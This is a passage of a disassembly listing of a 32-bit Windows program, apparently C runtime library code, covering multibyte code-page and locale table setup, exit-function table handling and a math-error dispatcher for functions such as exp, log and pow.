and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41906C: ; CODE XREF: sub_419044+10�j
pop esi
locret_41906D: ; CODE XREF: sub_419044+5�j
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
sub_41906E proc near ; CODE XREF: sub_4192C7+FF�p
; sub_4192C7+149�p
sub eax, 3A4h
jz short loc_419097
sub eax, 4
jz short loc_419091
sub eax, 0Dh
jz short loc_41908B
dec eax
jz short loc_419085
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419085: ; CODE XREF: sub_41906E+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41908B: ; CODE XREF: sub_41906E+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_419091: ; CODE XREF: sub_41906E+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_419097: ; CODE XREF: sub_41906E+5�j
mov eax, 411h
retn
sub_41906E endp
; =============== S U B R O U T I N E =======================================
sub_41909D proc near ; CODE XREF: sub_4192C7:loc_41943C�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47A400
rep stosd
stosb
xor eax, eax
mov dword_47A504, eax
mov dword_47A3F0, eax
mov dword_47A3E8, eax
mov edi, offset word_47A510
stosd
stosd
stosd
pop edi
retn
sub_41909D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190C6 proc near ; CODE XREF: sub_4192C7:loc_419441�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_42CE38
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_47A504
call ds:dword_41F18C
cmp eax, 1
mov esi, 100h
jnz loc_419206
xor eax, eax
loc_4190FB: ; CODE XREF: sub_4190C6+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_4190FB
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41914B
push ebx
lea edx, [ebp+var_11]
push edi
loc_41911A: ; CODE XREF: sub_4190C6+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_419141
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_419141: ; CODE XREF: sub_4190C6+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41911A
pop edi
pop ebx
loc_41914B: ; CODE XREF: sub_4190C6+4D�j
push 0
push dword_47A3E8
lea eax, [ebp+var_518]
push dword_47A504
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41AF01
push 0
push dword_47A504
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_47A3E8
call sub_4182E4
push 0
push dword_47A504
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_47A3E8
call sub_4182E4
add esp, 5Ch
xor eax, eax
loc_4191C0: ; CODE XREF: sub_4190C6+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_4191E3
or byte_47A401[eax], 10h
mov cl, [ebp+eax+var_218]
loc_4191DB: ; CODE XREF: sub_4190C6+130�j
mov byte_47A520[eax], cl
jmp short loc_4191FF
; ---------------------------------------------------------------------------
loc_4191E3: ; CODE XREF: sub_4190C6+105�j
test cl, 2
jz short loc_4191F8
or byte_47A401[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_4191DB
; ---------------------------------------------------------------------------
loc_4191F8: ; CODE XREF: sub_4190C6+120�j
and byte_47A520[eax], 0
loc_4191FF: ; CODE XREF: sub_4190C6+11B�j
inc eax
cmp eax, esi
jb short loc_4191C0
jmp short loc_41924A
; ---------------------------------------------------------------------------
loc_419206: ; CODE XREF: sub_4190C6+2D�j
xor eax, eax
loc_419208: ; CODE XREF: sub_4190C6+182�j
cmp eax, 41h
jb short loc_419226
cmp eax, 5Ah
ja short loc_419226
or byte_47A401[eax], 10h
mov cl, al
add cl, 20h
loc_41921E: ; CODE XREF: sub_4190C6+176�j
mov byte_47A520[eax], cl
jmp short loc_419245
; ---------------------------------------------------------------------------
loc_419226: ; CODE XREF: sub_4190C6+145�j
; sub_4190C6+14A�j
cmp eax, 61h
jb short loc_41923E
cmp eax, 7Ah
ja short loc_41923E
or byte_47A401[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41921E
; ---------------------------------------------------------------------------
loc_41923E: ; CODE XREF: sub_4190C6+163�j
; sub_4190C6+168�j
and byte_47A520[eax], 0
loc_419245: ; CODE XREF: sub_4190C6+15E�j
inc eax
cmp eax, esi
jb short loc_419208
loc_41924A: ; CODE XREF: sub_4190C6+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_4182D6
leave
retn
sub_4190C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419258 proc near ; CODE XREF: sub_4195CB+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_427F68
call __SEH_prolog
push 0Dh
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_415456
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_47A3EC
jz short loc_4192AA
test esi, esi
jz short loc_419297
dec dword ptr [esi]
jnz short loc_419297
push esi
call sub_412FE4
pop ecx
loc_419297: ; CODE XREF: sub_419258+32�j
; sub_419258+36�j
mov eax, dword_47A3EC
mov [edi+60h], eax
mov esi, dword_47A3EC
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_4192AA: ; CODE XREF: sub_419258+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4192BE
mov eax, esi
call __SEH_epilog
retn
sub_419258 endp
; =============== S U B R O U T I N E =======================================
sub_4192BB proc near ; DATA XREF: .rdata:stru_427F68�o
mov esi, [ebp-20h]
sub_4192BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4192BE proc near ; CODE XREF: sub_419258+56�p
push 0Dh
call sub_41686D
pop ecx
retn
sub_4192BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192C7 proc near ; CODE XREF: sub_41945D+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41943C
xor edx, edx
xor eax, eax
loc_4192EC: ; CODE XREF: sub_4192C7+36�j
cmp dword_42CE58[eax], esi
jz short loc_419359
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_4192EC
lea eax, [ebp+var_1C]
push eax
push esi
call ds:dword_41F18C
cmp eax, 1
jnz loc_419434
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_47A400
rep stosd
stosb
mov dword_47A504, esi
mov dword_47A3E8, ebx
jbe loc_419422
cmp [ebp+var_16], 0
jz loc_4193FA
lea ecx, [ebp+var_15]
loc_419343: ; CODE XREF: sub_4192C7+12D�j
mov dl, [ecx]
test dl, dl
jz loc_4193FA
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_4193EA
; ---------------------------------------------------------------------------
loc_419359: ; CODE XREF: sub_4192C7+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47A400
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_42CE68[ecx]
loc_419375: ; CODE XREF: sub_4192C7+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_4193A4
; ---------------------------------------------------------------------------
loc_41937B: ; CODE XREF: sub_4192C7+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_4193A8
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_4193A0
mov edx, [ebp+var_8]
mov dl, byte_42CE50[edx]
loc_419395: ; CODE XREF: sub_4192C7+D7�j
or byte_47A401[eax], dl
inc eax
cmp eax, edi
jbe short loc_419395
loc_4193A0: ; CODE XREF: sub_4192C7+C3�j
inc esi
inc esi
mov al, [esi]
loc_4193A4: ; CODE XREF: sub_4192C7+B2�j
test al, al
jnz short loc_41937B
loc_4193A8: ; CODE XREF: sub_4192C7+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_419375
mov eax, [ebp+arg_0]
mov dword_47A504, eax
mov dword_47A3F0, 1
call sub_41906E
lea ecx, dword_42CE5C[ecx]
mov esi, ecx
mov edi, offset word_47A510
movsd
movsd
mov dword_47A3E8, eax
movsd
jmp short loc_419441
; ---------------------------------------------------------------------------
loc_4193E2: ; CODE XREF: sub_4192C7+125�j
or byte_47A401[eax], 4
inc eax
loc_4193EA: ; CODE XREF: sub_4192C7+8D�j
cmp eax, edx
jbe short loc_4193E2
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_419343
loc_4193FA: ; CODE XREF: sub_4192C7+73�j
; sub_4192C7+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_4193FF: ; CODE XREF: sub_4192C7+145�j
or byte_47A401[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4193FF
mov eax, esi
call sub_41906E
mov dword_47A3E8, eax
mov dword_47A3F0, ecx
jmp short loc_419428
; ---------------------------------------------------------------------------
loc_419422: ; CODE XREF: sub_4192C7+69�j
mov dword_47A3F0, ebx
loc_419428: ; CODE XREF: sub_4192C7+159�j
xor eax, eax
mov edi, offset word_47A510
stosd
stosd
stosd
jmp short loc_419441
; ---------------------------------------------------------------------------
loc_419434: ; CODE XREF: sub_4192C7+46�j
cmp dword_47A024, ebx
jz short loc_41944A
loc_41943C: ; CODE XREF: sub_4192C7+1B�j
call sub_41909D
loc_419441: ; CODE XREF: sub_4192C7+119�j
; sub_4192C7+16B�j
call sub_4190C6
xor eax, eax
jmp short loc_41944D
; ---------------------------------------------------------------------------
loc_41944A: ; CODE XREF: sub_4192C7+173�j
or eax, 0FFFFFFFFh
loc_41944D: ; CODE XREF: sub_4192C7+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41945D proc near ; CODE XREF: sub_4195AD+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_427F78
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_416901
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_47A024, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41949A
mov dword_47A024, 1
call ds:dword_41F188
jmp short loc_4194C5
; ---------------------------------------------------------------------------
loc_41949A: ; CODE XREF: sub_41945D+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_4194B1
mov dword_47A024, 1
call ds:dword_41F184
jmp short loc_4194C5
; ---------------------------------------------------------------------------
loc_4194B1: ; CODE XREF: sub_41945D+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_4194C5
mov dword_47A024, 1
mov eax, dword_47A188
loc_4194C5: ; CODE XREF: sub_41945D+3B�j
; sub_41945D+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_47A504
jz loc_41958F
mov esi, dword_47A3EC
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_4194E5
cmp [esi], edi
jz short loc_4194F5
loc_4194E5: ; CODE XREF: sub_41945D+82�j
push 220h
call sub_41344D
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_4194F5: ; CODE XREF: sub_41945D+86�j
cmp esi, edi
jz short loc_419578
push [ebp+arg_0]
call sub_4192C7
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_419578
mov [esi], edi
mov eax, dword_47A504
mov [esi+4], eax
mov eax, dword_47A3F0
mov [esi+8], eax
mov eax, dword_47A3E8
mov [esi+0Ch], eax
xor eax, eax
loc_419525: ; CODE XREF: sub_41945D+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41953D
mov cx, word_47A510[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_419525
; ---------------------------------------------------------------------------
loc_41953D: ; CODE XREF: sub_41945D+CE�j
xor eax, eax
loc_41953F: ; CODE XREF: sub_41945D+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_419556
mov cl, byte_47A400[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41953F
; ---------------------------------------------------------------------------
loc_419556: ; CODE XREF: sub_41945D+EA�j
xor eax, eax
loc_419558: ; CODE XREF: sub_41945D+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_419572
mov cl, byte_47A520[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_419558
; ---------------------------------------------------------------------------
loc_419572: ; CODE XREF: sub_41945D+103�j
mov dword_47A3EC, esi
loc_419578: ; CODE XREF: sub_41945D+9A�j
; sub_41945D+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_419592
cmp esi, dword_47A3EC
jz short loc_419592
push esi
call sub_412FE4
pop ecx
jmp short loc_419592
; ---------------------------------------------------------------------------
loc_41958F: ; CODE XREF: sub_41945D+71�j
mov [ebp+var_1C], edi
loc_419592: ; CODE XREF: sub_41945D+11F�j
; sub_41945D+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4195A4
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41945D endp
; =============== S U B R O U T I N E =======================================
sub_4195A4 proc near ; CODE XREF: sub_41945D+139�p
; DATA XREF: .rdata:stru_427F78�o
push 0Dh
call sub_41686D
pop ecx
retn
sub_4195A4 endp
; =============== S U B R O U T I N E =======================================
sub_4195AD proc near ; CODE XREF: sub_41A15E+9�p
; sub_41A1C7+D�p ...
cmp dword_47B674, 0
jnz short loc_4195C8
push 0FFFFFFFDh
call sub_41945D
pop ecx
mov dword_47B674, 1
loc_4195C8: ; CODE XREF: sub_4195AD+7�j
xor eax, eax
retn
sub_4195AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195CB proc near ; CODE XREF: sub_4141AD+2C�p
; sub_4141AD+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_415456
mov eax, [eax+60h]
cmp eax, dword_47A3EC
jz short loc_4195EA
call sub_419258
loc_4195EA: ; CODE XREF: sub_4195CB+18�j
cmp dword ptr [eax+8], 0
jnz short loc_419601
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_412C40
add esp, 0Ch
jmp short loc_419649
; ---------------------------------------------------------------------------
loc_419601: ; CODE XREF: sub_4195CB+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_419646
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41960D: ; CODE XREF: sub_4195CB+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41964C
inc edi
inc esi
test ecx, ecx
jz short loc_419658
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_419652
and [edi-2], dl
loc_419630: ; CODE XREF: sub_4195CB+85�j
test ecx, ecx
jz short loc_419644
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_419644: ; CODE XREF: sub_4195CB+67�j
; sub_4195CB+8B�j ...
pop esi
pop ebx
loc_419646: ; CODE XREF: sub_4195CB+3B�j
mov eax, [ebp+arg_0]
loc_419649: ; CODE XREF: sub_4195CB+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41964C: ; CODE XREF: sub_4195CB+4F�j
inc edi
inc esi
test dl, dl
jz short loc_419630
loc_419652: ; CODE XREF: sub_4195CB+60�j
test ecx, ecx
jnz short loc_41960D
jmp short loc_419644
; ---------------------------------------------------------------------------
loc_419658: ; CODE XREF: sub_4195CB+55�j
and byte ptr [edi-1], 0
jmp short loc_419644
sub_4195CB endp
; =============== S U B R O U T I N E =======================================
sub_41965E proc near ; CODE XREF: sub_419706+18�p
push esi
push dword_47B670
call sub_41CE2D
pop ecx
mov ecx, dword_47B66C
mov esi, eax
mov eax, dword_47B670
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_4196D1
mov ecx, 800h
cmp esi, ecx
jnb short loc_41968E
mov ecx, esi
loc_41968E: ; CODE XREF: sub_41965E+2C�j
add ecx, esi
push ecx
push eax
call sub_41318A
test eax, eax
pop ecx
pop ecx
jnz short loc_4196B4
add esi, 10h
push esi
push dword_47B670
call sub_41318A
test eax, eax
pop ecx
pop ecx
jnz short loc_4196B4
pop esi
retn
; ---------------------------------------------------------------------------
loc_4196B4: ; CODE XREF: sub_41965E+3D�j
; sub_41965E+52�j
mov ecx, dword_47B66C
sub ecx, dword_47B670
mov dword_47B670, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_47B66C, ecx
loc_4196D1: ; CODE XREF: sub_41965E+23�j
mov [ecx], edi
add dword_47B66C, 4
mov eax, edi
pop esi
retn
sub_41965E endp
; =============== S U B R O U T I N E =======================================
sub_4196DE proc near ; DATA XREF: .data:0042A018�o
push 80h
call sub_41344D
test eax, eax
pop ecx
mov dword_47B670, eax
jnz short loc_4196F6
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_4196F6: ; CODE XREF: sub_4196DE+12�j
and dword ptr [eax], 0
mov eax, dword_47B670
mov dword_47B66C, eax
xor eax, eax
retn
sub_4196DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419706 proc near ; CODE XREF: sub_41973E+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_427F88
call __SEH_prolog
call loc_4143E9
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41965E
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_419738
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419706 endp
; =============== S U B R O U T I N E =======================================
sub_419738 proc near ; CODE XREF: sub_419706+24�p
; DATA XREF: .rdata:stru_427F88�o
call sub_4143F2
retn
sub_419738 endp
; =============== S U B R O U T I N E =======================================
sub_41973E proc near ; CODE XREF: sub_4143FB+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_419706
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41973E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419750 proc near ; CODE XREF: .text:loc_414A16�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427F98
call __SEH_prolog
mov [ebp+var_1C], offset dword_4288D0
loc_419763: ; CODE XREF: sub_419750+3C�j
cmp [ebp+var_1C], offset dword_4288D0
jnb short loc_41978E
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_419784
call eax
jmp short loc_419784
; ---------------------------------------------------------------------------
loc_41977D: ; DATA XREF: .rdata:stru_427F98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419781: ; DATA XREF: .rdata:stru_427F98�o
mov esp, [ebp+ms_exc.old_esp]
loc_419784: ; CODE XREF: sub_419750+27�j
; sub_419750+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_419763
; ---------------------------------------------------------------------------
loc_41978E: ; CODE XREF: sub_419750+1A�j
call __SEH_epilog
retn
sub_419750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419794 proc near ; DATA XREF: sub_4143FB:loc_414431�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_427FA8
call __SEH_prolog
mov [ebp+var_1C], offset dword_4288D8
loc_4197A7: ; CODE XREF: sub_419794+3C�j
cmp [ebp+var_1C], offset dword_4288D8
jnb short loc_4197D2
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4197C8
call eax
jmp short loc_4197C8
; ---------------------------------------------------------------------------
loc_4197C1: ; DATA XREF: .rdata:stru_427FA8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4197C5: ; DATA XREF: .rdata:stru_427FA8�o
mov esp, [ebp+ms_exc.old_esp]
loc_4197C8: ; CODE XREF: sub_419794+27�j
; sub_419794+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4197A7
; ---------------------------------------------------------------------------
loc_4197D2: ; CODE XREF: sub_419794+1A�j
call __SEH_epilog
retn
sub_419794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197D8 proc near ; CODE XREF: sub_414670+B5�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42CE38
xor eax, [ebp+4]
mov ecx, 0A1h
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
cmp eax, ecx
push esi
jg loc_41990D
jz loc_419901
cmp eax, 18h
jg loc_419891
jz short loc_41987E
push 2
pop ecx
sub eax, ecx
jz short loc_41986F
dec eax
jz short loc_419863
sub eax, 5
jz short loc_419854
dec eax
jz short loc_419848
sub eax, 5
jz short loc_419835
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_4198D2
; ---------------------------------------------------------------------------
loc_419835: ; CODE XREF: sub_4197D8+48�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419848: ; CODE XREF: sub_4197D8+43�j
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_419854: ; CODE XREF: sub_4197D8+40�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419863: ; CODE XREF: sub_4197D8+3B�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_41986F: ; CODE XREF: sub_4197D8+38�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_41987E: ; CODE XREF: sub_4197D8+31�j
mov [ebp+var_24], 3
loc_419885: ; CODE XREF: sub_4197D8+E5�j
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_419994
; ---------------------------------------------------------------------------
loc_419891: ; CODE XREF: sub_4197D8+2B�j
sub eax, 19h
jz short loc_4198CB
dec eax
jz short loc_4198BF
dec eax
jz short loc_4198B6
dec eax
jz loc_4199F4
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_4198B6: ; CODE XREF: sub_4197D8+C2�j
mov [ebp+var_24], 2
jmp short loc_419885
; ---------------------------------------------------------------------------
loc_4198BF: ; CODE XREF: sub_4197D8+BF�j
mov eax, [ebp+arg_8]
fld1
fstp qword ptr [eax]
jmp loc_419A5E
; ---------------------------------------------------------------------------
loc_4198CB: ; CODE XREF: sub_4197D8+BC�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4198D2: ; CODE XREF: sub_4197D8+58�j
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
mov [ebp+var_24], 4
fstp [ebp+var_C]
call off_42CF48
pop ecx
jmp loc_419A59
; ---------------------------------------------------------------------------
loc_419901: ; CODE XREF: sub_4197D8+22�j
mov [ebp+var_24], 3
jmp loc_41998D
; ---------------------------------------------------------------------------
loc_41990D: ; CODE XREF: sub_4197D8+1C�j
mov ecx, 3EAh
cmp eax, ecx
jg loc_4199D8
jz loc_4199CF
sub eax, 0A2h
jz short loc_419986
sub eax, 4
jz short loc_419976
sub eax, 4
jz short loc_419966
dec eax
jz short loc_41995A
sub eax, 33Dh
jz short loc_41994E
dec eax
jnz loc_419A5E
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_41994E: ; CODE XREF: sub_4197D8+161�j
mov [ebp+var_20], offset aLog_0 ; "log"
jmp loc_419A1C
; ---------------------------------------------------------------------------
loc_41995A: ; CODE XREF: sub_4197D8+15A�j
mov [ebp+var_20], offset aLog2 ; "log2"
jmp loc_4199FB
; ---------------------------------------------------------------------------
loc_419966: ; CODE XREF: sub_4197D8+157�j
mov [ebp+var_24], 2
mov [ebp+var_20], offset aLog2 ; "log2"
jmp short loc_419994
; ---------------------------------------------------------------------------
loc_419976: ; CODE XREF: sub_4197D8+152�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp10 ; "exp10"
jmp short loc_419994
; ---------------------------------------------------------------------------
loc_419986: ; CODE XREF: sub_4197D8+14D�j
mov [ebp+var_24], 4
loc_41998D: ; CODE XREF: sub_4197D8+130�j
mov [ebp+var_20], offset aExp2 ; "exp2"
loc_419994: ; CODE XREF: sub_4197D8+6B�j
; sub_4197D8+86�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_42CF48
test eax, eax
pop ecx
jnz loc_419A59
call sub_417C70
mov dword ptr [eax], 22h
jmp loc_419A59
; ---------------------------------------------------------------------------
loc_4199CF: ; CODE XREF: sub_4197D8+142�j
mov [ebp+var_20], offset aExp ; "exp"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_4199D8: ; CODE XREF: sub_4197D8+13C�j
sub eax, 3EBh
jz short loc_419A15
dec eax
jz short loc_419A0C
dec eax
jz short loc_419A03
dec eax
jz short loc_4199F4
dec eax
jnz short loc_419A5E
mov [ebp+var_20], offset aModf ; "modf"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_4199F4: ; CODE XREF: sub_4197D8+C5�j
; sub_4197D8+20E�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4199FB: ; CODE XREF: sub_4197D8+77�j
; sub_4197D8+92�j ...
mov eax, [ebp+arg_0]
mov esi, [ebp+arg_8]
jmp short loc_419A26
; ---------------------------------------------------------------------------
loc_419A03: ; CODE XREF: sub_4197D8+20B�j
mov [ebp+var_20], offset aFloor ; "floor"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_419A0C: ; CODE XREF: sub_4197D8+208�j
mov [ebp+var_20], offset aCeil ; "ceil"
jmp short loc_419A1C
; ---------------------------------------------------------------------------
loc_419A15: ; CODE XREF: sub_4197D8+205�j
mov [ebp+var_20], offset aAtan ; "atan"
loc_419A1C: ; CODE XREF: sub_4197D8+D9�j
; sub_4197D8+171�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov esi, [ebp+arg_8]
fstp qword ptr [esi]
loc_419A26: ; CODE XREF: sub_4197D8+229�j
fld qword ptr [eax]
mov eax, [ebp+arg_4]
fstp [ebp+var_1C]
mov [ebp+var_24], 1
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call off_42CF48
test eax, eax
pop ecx
jnz short loc_419A59
call sub_417C70
mov dword ptr [eax], 21h
loc_419A59: ; CODE XREF: sub_4197D8+124�j
; sub_4197D8+1E1�j ...
fld [ebp+var_C]
fstp qword ptr [esi]
loc_419A5E: ; CODE XREF: sub_4197D8+4B�j
; sub_4197D8+CC�j ...
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_4182D6
leave
retn
sub_4197D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A6C proc near ; CODE XREF: sub_419AA1+3A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_428068
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
